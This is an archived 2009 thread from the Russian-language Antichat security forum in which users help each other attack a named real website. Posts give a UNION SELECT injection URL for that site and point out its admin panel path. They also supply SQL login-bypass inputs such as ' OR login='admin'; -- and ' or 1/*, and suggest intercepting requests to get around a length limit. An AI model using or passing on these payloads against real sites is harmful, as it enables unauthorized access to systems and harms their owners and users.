ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.01.2009, 15:53
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973
Репутация:
15
|
|
http://www.hard-ekt.ru/index.php?section=1+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20/* читай внимательнее!!!
|
|
|
10.01.2009, 17:10
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078
Репутация:
126
|
|
Сообщение от Ghost0ff
http://www.hard-ekt.ru/index.php?section=1+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20/* читай внимательнее!!!
как то ты не в тему))
|
|
|
|
10.01.2009, 17:15
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078
Репутация:
126
|
|
а какие есть способы нахождения админки кроме тупого подбора?
http://www.hard-ekt.ru/
где например она находится здесь?
|
|
|
|
10.01.2009, 17:17
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
Сообщение от F4R
а какие есть способы нахождения админки кроме тупого подбора?
http://www.hard-ekt.ru/
где например она находится здесь?
иногда помогает файл robots.txt
http://www.hard-ekt.ru/wedadmin/
|
|
|
|
10.01.2009, 18:22
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от F4R
а какие есть способы нахождения админки кроме тупого подбора?
http://www.hard-ekt.ru/
где например она находится здесь?
Всегда как минимум смотри исходники страницы, увидел Joomla, Wordpress и тому подобное - делаешь выводы, где админка. Или слушаешь совет выше, или пишешь свой брутер на диры (не так сложно, кстати)
ЗЫЖ за исключением наличия полей ввода логина-пароля прямо на главной странице, конечно 
|
|
|
|
10.01.2009, 19:22
|
|
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
Провел на форуме:
800727
Репутация:
83
|
|
А как реализовывается обход авторизации к примеру в данном случае
SELECT * FROM adminpanel WHERE pass = ' ' ?
Последний раз редактировалось ronald; 10.01.2009 в 19:25..
|
|
|
|
10.01.2009, 19:34
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от ronald
А как реализовывается обход авторизации к примеру в данном случае
SELECT * FROM adminpanel WHERE pass = ' ' ?
то в это поле пишем
Код:
12345' OR login='admin'; --
запрос станет таким
Код:
SELECT * FROM adminpanel WHERE (login='admin' AND pass='12345') OR (login='admin');
авторизация будет успешна пройдена под логином admin
|
|
|
|
10.01.2009, 19:38
|
|
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
Провел на форуме:
800727
Репутация:
83
|
|
там ограничение на длину=7
|
|
|
|
10.01.2009, 19:40
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от ronald
там ограничение на длину=7
линк в студию =)
|
|
|
|
10.01.2009, 19:43
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
' or 1/*
Тут 8, если ограничение только в форме, перехватывай пакет
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид